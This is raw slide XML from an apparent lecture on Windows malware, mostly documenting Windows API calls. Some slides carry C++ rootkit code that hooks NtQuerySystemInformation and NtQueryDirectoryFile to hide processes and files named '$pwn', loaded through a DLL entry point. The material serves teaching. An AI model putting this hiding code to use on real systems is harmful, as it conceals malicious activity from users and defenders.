                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>These structures contain information about the resource usage of each process, including the number of threads and handles used by the process, the peak page-file usage, and the number of memory pages that the process has allocated.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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122420"/>
            <a:ext cx="9890125" cy="2266315"/>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pReturnValue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converted string, including the null terminator.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mbstr</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address of a buffer for the resulting converted multibyte character string.</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sizeInBytes</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mbstr buffer.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wcstr</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Points to the wide character string to be converted.</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">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The maximum number of bytes to store in the mbstr buffer, not including the terminating null character, or _TRUNCATE.</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589915" y="1158875"/>
            <a:ext cx="3429000" cy="278447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500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>errno_t wcstombs_s(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*pReturnValue,</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char *mbstr,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sizeInBytes,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const wchar_t *wcstr,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count</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5083175" y="1608455"/>
            <a:ext cx="6518910" cy="1734820"/>
            <a:chOff x="8286" y="2697"/>
            <a:chExt cx="10266" cy="2732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形标注 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8286" y="2697"/>
              <a:ext cx="10267" cy="2733"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -65749"/>
                <a:gd name="adj2" fmla="val -933"/>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287" y="2901"/>
              <a:ext cx="10265" cy="232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Converts a sequence of wide characters to a corresponding sequence of multibyte characters. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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732655"/>
            <a:ext cx="9890125" cy="8839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pszFirst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null-terminated string being searched.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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pszSrch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a: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substring to search for.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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905510" y="1673225"/>
            <a:ext cx="3429000" cy="224536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500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>PCSTR StrStrIA(</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pszFirst,</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pszSrch</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 name="圆角矩形标注 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5083175" y="1928495"/>
            <a:ext cx="6519545" cy="1735455"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61415"/>
              <a:gd name="adj2" fmla="val 384"/>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5083810" y="2058035"/>
            <a:ext cx="6518275" cy="147637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Finds the first occurrence of a substring within a string. The comparison is not case-sensitive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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9890125" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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[in] FileHandle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handle to the directory or file for which you want to retrieve directory information.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IoStatusBlock</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an IO_STATUS_BLOCK structure that receives the final completion status and information about the operation.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FileInformation</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 buffer that receives the desired information about the file. The structure of the information returned in the buffer is defined by the FileInformationClass parameter.</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348615" y="1019175"/>
            <a:ext cx="6770370" cy="332549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a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>__kernel_entry NTSYSCALLAPI NTSTATUS NtQueryDirectoryFile(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HANDLE                 FileHandle,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HANDLE                 Event,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PIO_APC_ROUTINE        ApcRoutine,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PVOID                  ApcContext,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PIO_STATUS_BLOCK       IoStatusBlock,</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PVOID                  FileInformation,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ULONG                  Length,</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FILE_INFORMATION_CLASS FileInformationClass,</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ReturnSingleEntry,</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PUNICODE_STRING        FileName,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RestartScan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576830"/>
            <a:chOff x="11465" y="1605"/>
            <a:chExt cx="7567" cy="4058"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="1605"/>
              <a:ext cx="7567" cy="4058"/>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1996"/>
              <a:ext cx="7566" cy="341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The NtQueryDirectoryFile routine returns information about files and directories in a directory.</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604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FILE_ID_BOTH_DIR_INFORMATION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348615" y="1019175"/>
            <a:ext cx="4446905" cy="5354320"/>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a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct _FILE_ID_BOTH_DIR_INFORMATION {</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NextEntryOffset;</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FileIndex;</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CreationTime;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LastAccessTime;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LastWriteTime;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ChangeTime;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EndOfFile;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AllocationSize;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FileAttributes;</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EaSize;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CCHAR         ShortNameLength;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ShortName[12];</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FileId;</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FileName[1];</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FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121275" y="1019175"/>
            <a:ext cx="6709410" cy="170116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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121593" y="1200785"/>
            <a:ext cx="6708775" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The structure is used to query file reference number information for the files in a directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911090" y="2978785"/>
            <a:ext cx="6919595" cy="296037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NextEntryOffset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next FILE_ID_BOTH_DIR_INFORMATION entry, if multiple entries are present in a buffer. This member is zero if no other entries follow this one.</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FileIndex</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file within the parent directory. This member is undefined for file systems, such as NTFS, in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort ord</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CreateThread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11655425" cy="1699260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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dwStackSize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initial size of the stack, in bytes. The system rounds this value to the nearest page.</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pszSrch</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substring to search for.</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lpStartAddress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application-defined function to be executed by the thread.</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[out, optional] lpThreadId</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pointer to a variable that receives the thread identifier.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="5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348615" y="1019175"/>
            <a:ext cx="6770370" cy="313817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000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>HANDLE CreateThread(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LPSECURITY_ATTRIBUTES   lpThreadAttributes,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SIZE_T                  dwStackSize,</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LPTHREAD_START_ROUTINE  lpStartAddress,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__drv_aliasesMem LPVOID lpParameter,</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DWORD                   dwCreationFlags,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[out, optional] LPDWORD                 lpThreadId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259965"/>
            <a:chOff x="11465" y="1605"/>
            <a:chExt cx="7567" cy="3559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="1605"/>
              <a:ext cx="7567" cy="35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004"/>
              <a:ext cx="7566" cy="2761"/>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Creates a thread to execute within the virtual address space of the calling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process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2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241300" y="1036320"/>
            <a:ext cx="11823700" cy="10686415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)</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lpNtQuerySystemInformation = NTSTATUS (WINAPI *)(SYSTEM_INFORMATION_CLASS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lpNtQuerySystemInformation lpOrgNtQuerySystemInformation;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lpNtQueryDirectoryFile = NTSTATUS (WINAPI *)(HANDLE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lpNtQueryDirectoryFile lpOrgNtQueryDirectoryFile;</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lpCurrentProcessName[MAX_PATH];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lpCurrentDirectoryName[MAX_PATH];</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//this function is to hide certain processes with name including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NTSTATUS WINAPI hkNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS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r>
              <a:rPr lang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>processes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lpOrgNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength,ReturnLength);</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(SystemInformationClass == _SYSTEM_INFORMATION_CLASS::SystemProcessInformation &amp;&amp; QueryStatus == STATUS_SUCCESS)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PSYSTEM_PROCESS_INFORMATION lpCurrentProcess; //process information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auto lpNextProcess = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;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 = lpNextProcess;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(PSYSTEM_PROCESS_INFORMATION)((DWORD_PTR)lpCurrentProcess + lpCurrentProcess-&gt;NextEntryOffset); //obtain the next process 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wcstombs_s(nullptr, lpCurrentProcessName, lpNextProcess-&gt;ImageName.Buffer,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lpCurrentProcessName[MAX_PATH - 1] = '\0';</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(StrStrIA(lpCurrentProcessName,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(lpNextProcess-&gt;NextEntryOffset == 0)   //trying to hide the next process ("$pwn")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> //it’s the last process</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0;</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lpNextProcess-&gt;NextEntryOffset;</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lpCurrentProcess;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 while (lpCurrentProcess-&gt;NextEntryOffset != 0);</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77222 " pathEditMode="relative" ptsTypes="">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file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240030" y="1038860"/>
            <a:ext cx="11711940" cy="8632190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//this function is to hide certain files with name including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NTSTATUS WINAPI hkNtQueryDirectoryFile(HANDLE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files and directories in a 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lpOrgNtQueryDirectoryFile(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan); </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(FileInformationClass == FILE_INFORMATION_CLASS::FileIdBothDirectoryInformation &amp;&amp; QueryStatus == STATUS_SUCCESS)</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PFILE_ID_BOTH_DIR_INFORMATION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auto lpNextDirectory = (PFILE_ID_BOTH_DIR_INFORMATION)FileInformation;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 = lpNextDirectory;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(PFILE_ID_BOTH_DIR_INFORMATION)((DWORD_PTR)lpCurrentDirectory + lpCurrentDirectory-&gt;NextEntryOffset); //obtain the next file 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wcstombs_s(nullptr, lpCurrentDirectoryName, lpNextDirectory-&gt;FileName,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lpCurrentDirectoryName[MAX_PATH - 1] = '\0';</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(StrStrIA(lpCurrentDirectoryName, "$pwn")) //trying to hide the next file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(lpNextDirectory-&gt;NextEntryOffset == 0)</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lpNextDirectory-&gt;NextEntryOffset;</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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 while (lpCurrentDirectory-&gt;NextEntryOffset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5625 0 L 0.00505208 -0.593426 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-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94310" y="1047115"/>
            <a:ext cx="11803380" cy="9093835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>void InitHook()//hook NtQuerySystemInformation by self defined hkNtQuerySystemInformation and NtQueryDirectoryFile by self defined hkNtQueryDirectoryFile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lpOrgNtQuerySystemInformation = (lpNtQuerySystemInformation) IAT::Hook("ntdll.dll", "NtQuerySystemInformation", &amp;hkNtQuerySystemInformation);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lpOrgNtQueryDirectoryFile = (lpNtQueryDirectoryFile) IAT::Hook("ntdll.dll", "NtQueryDirectoryFile", &amp;hkNtQueryDirectoryFile,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ExitThread(0);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void RemoveHookAndFreeLibrary(const HMODULE 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"NtQuerySystemInformation", (LPVOID)lpOrgNtQuerySystemInformation);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"NtQueryDirectoryFile", (LPVOID)lpOrgNtQueryDirectoryFile,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FreeLibraryAndExitThread(hModule,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BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)</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switch (ul_reason_for_call)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DLL_PROCESS_ATTACH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DisableThreadLibraryCalls(hModule); //Disables the DLL_THREAD_ATTACH and DLL_THREAD_DETACH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>notifications for the specified dynamic-link library (DLL).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CreateThread(nullptr, NULL, (LPTHREAD_START_ROUTINE)InitHook, nullptr, 0, nullptr);</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DLL_PROCESS_DETACH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RemoveHookAndFreeLibrary(hModule);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default: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FALSE;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TRUE;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571574 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-2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GetProcessImageFileNameA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6575" y="4344670"/>
            <a:ext cx="11655425" cy="1509395"/>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hProcess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handle to the process.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[out] lpImageFileName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a buffer that receives the full path to the executable file.</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lpImageFileName buffer, in characters.</a:t>
            </a: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793115" y="1235075"/>
            <a:ext cx="5170805" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>DWORD GetProcessImageFileNameA(</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HANDLE hProcess,</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[out] LPSTR  lpImageFileName,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DWORD  nSize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rot="0">
            <a:off x="6594475" y="1758315"/>
            <a:ext cx="4805045" cy="1814830"/>
            <a:chOff x="11465" y="2185"/>
            <a:chExt cx="7567" cy="2858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11465" y="2185"/>
              <a:ext cx="7567" cy="28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561"/>
              <a:ext cx="7566"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Retrieves the name of the executable file for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4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3240405" y="1941195"/>
            <a:ext cx="5711190" cy="3220720"/>
            <a:chOff x="4964" y="3057"/>
            <a:chExt cx="8994" cy="5072"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="组合 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="6115"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13"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4" name="椭圆 13"/>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6" name="椭圆 1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文本框 1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8" name="文本框 1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Backdoors</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19" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="4964" y="3057"/>
              <a:ext cx="8995" cy="2014"/>
              <a:chOff x="1726" y="2132"/>
              <a:chExt cx="8995" cy="2014"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="圆角矩形 19"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>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2" name="椭圆 14"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId7"/>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0"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId8"/>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文本框 26"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>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5" name="文本框 27"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10"/>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Rootkits</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MODULEENTRY32</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873115" y="2952750"/>
            <a:ext cx="6169660" cy="3350895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:no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dwSize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structure, in bytes. </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th32ProcessID</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identifier of the process whose modules are to be examined.</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modBaseAddr</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base address of the module in the context of the owning process.</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hModule</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handle to the module in the context of the owning process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>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szModule[MAX_MODULE_NAME32 + 1]</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The module name.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>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577205" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>typedef struct tagMODULEENTRY32 {</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dwSize;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th32ModuleID;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th32ProcessID;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GlblcntUsage;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ProccntUsage;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BYTE    *modBaseAddr;</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modBaseSize;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HMODULE hModule;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szModule[MAX_MODULE_NAME32 + 1];</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szExePath[MAX_PATH];</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MODULEENTRY32;</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157595" y="1170940"/>
            <a:ext cx="5744210" cy="1576070"/>
            <a:chOff x="10385" y="2770"/>
            <a:chExt cx="9046"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Describes an entry from a list of the modules belonging to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CreateToolhelp32Snapshot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dwFlags</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portions of the system to be included in the snapshot.</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th32ProcessID</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process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process.</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HANDLE CreateToolhelp32Snapshot(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dwFlags,</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th32ProcessID</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
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6157595" y="1224280"/>
            <a:ext cx="5883275" cy="246443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6290310" y="1372235"/>
            <a:ext cx="5617845" cy="216852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Takes a snapshot of the specified processes, as well as the heaps, modules, and threads used by these processes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="27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Module32First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hSnapshot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handle to the snapshot returned from a previous call to the CreateToolhelp32Snapshot function.</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out] lpme</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pointer to a MODULEENTRY32 structure.</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BOOL Module32First(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HANDLE          hSnapshot,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out] LPMODULEENTRY32 lpme</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a:off x="6157595" y="1578610"/>
            <a:ext cx="5882640" cy="1766570"/>
            <a:chOff x="9697" y="1928"/>
            <a:chExt cx="9264" cy="2782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="圆角矩形 2"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9697" y="1928"/>
              <a:ext cx="9265" cy="27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230"/>
              <a:ext cx="8847" cy="2179"/>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the first module associated with a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GetModuleHandleA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dwFlags</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portions of the system to be included in the snapshot.</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th32ProcessID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process.</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HANDLE CreateToolhelp32Snapshot(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dwFlags,</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th32ProcessID</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4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6157595" y="1319530"/>
            <a:ext cx="5882640" cy="2109470"/>
            <a:chOff x="9697" y="2486"/>
            <a:chExt cx="9264" cy="3322"/>
